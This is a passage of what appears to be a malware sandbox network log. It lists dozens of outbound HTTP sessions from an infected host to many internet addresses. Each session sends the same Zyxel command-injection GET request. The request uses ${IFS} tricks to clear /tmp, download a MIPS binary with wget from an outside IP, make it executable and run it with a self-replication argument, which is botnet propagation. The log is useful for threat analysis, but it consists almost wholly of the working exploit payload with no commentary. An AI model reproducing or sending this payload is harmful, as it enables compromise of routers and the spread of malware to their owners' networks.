                                                Jan 12, 2024 18:24:44.062371016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6553192.168.2.1360776102.85.84.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062417030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6554192.168.2.1354204115.235.112.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062453985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6555192.168.2.135876674.103.20.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062468052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6556192.168.2.1353346148.115.131.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062524080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6557192.168.2.1346212121.87.102.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062544107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6558192.168.2.133361286.71.6.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062594891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6559192.168.2.134777881.53.40.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062623024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6560192.168.2.1351286210.227.41.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062678099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6561192.168.2.133500873.160.115.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062738895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6562192.168.2.133667235.212.217.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062742949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6563192.168.2.1353082193.154.138.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062787056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6564192.168.2.133894250.51.198.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062849045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6565192.168.2.13515265.96.241.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062891960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6566192.168.2.134339651.188.83.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062938929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6567192.168.2.13430328.200.151.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062963963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6568192.168.2.1340392204.109.1.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063007116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6569192.168.2.1351768187.203.56.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063055992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6570192.168.2.135173632.56.225.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063093901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6571192.168.2.1341812123.39.56.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063148022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6572192.168.2.1348198188.48.115.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063175917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6573192.168.2.134783437.103.140.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063235998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6574192.168.2.1357564162.181.79.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063261986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6575192.168.2.1358984199.232.20.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063323975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6576192.168.2.13388425.74.16.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063355923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6577192.168.2.135176235.254.148.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063380957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6578192.168.2.135010046.115.161.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063421965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6579192.168.2.1358886149.211.166.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063458920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6580192.168.2.1351656195.190.51.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063507080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6581192.168.2.134143873.13.225.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063559055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6582192.168.2.1355692105.151.69.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063575983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6583192.168.2.1346356149.238.246.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063626051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6584192.168.2.1344002177.128.99.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063678026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6585192.168.2.133841080.172.72.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063698053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6586192.168.2.1356964200.1.174.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063741922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6587192.168.2.1354638119.84.232.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063800097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6588192.168.2.1351114199.16.137.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063817978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6589192.168.2.1351036194.5.132.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063873053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6590192.168.2.135506818.8.85.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063880920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6591192.168.2.135857635.88.71.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063919067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6592192.168.2.1353302199.239.52.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063977003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6593192.168.2.13463164.137.111.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.063996077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6594192.168.2.1352098152.60.183.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064060926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6595192.168.2.1336180111.239.77.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064099073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6596192.168.2.1351728108.1.248.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064140081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6597192.168.2.134296812.138.147.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064177990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6598192.168.2.1346200155.5.73.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064207077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6599192.168.2.1338342109.103.208.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064249992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6600192.168.2.134761650.152.116.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064287901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6601192.168.2.1342160108.205.33.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064340115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6602192.168.2.1349436138.48.46.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064383984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6603192.168.2.1347482201.185.83.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064408064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6604192.168.2.133968663.58.206.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064450026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6605192.168.2.1347526120.214.103.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064490080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6606192.168.2.1349292171.97.41.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064517021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6607192.168.2.1344638108.98.207.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064560890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6608192.168.2.133352045.82.127.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064623117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6609192.168.2.1352532220.228.51.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064636946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6610192.168.2.135435659.162.209.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.064673901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6611192.168.2.13521284.41.38.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068272114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6612192.168.2.1352324201.72.61.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068299055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6613192.168.2.135941840.229.1.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068341970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6614192.168.2.1347248213.202.85.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068396091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6615192.168.2.1338304103.142.190.37443
                                                TimestampBytes transferredDirectionData
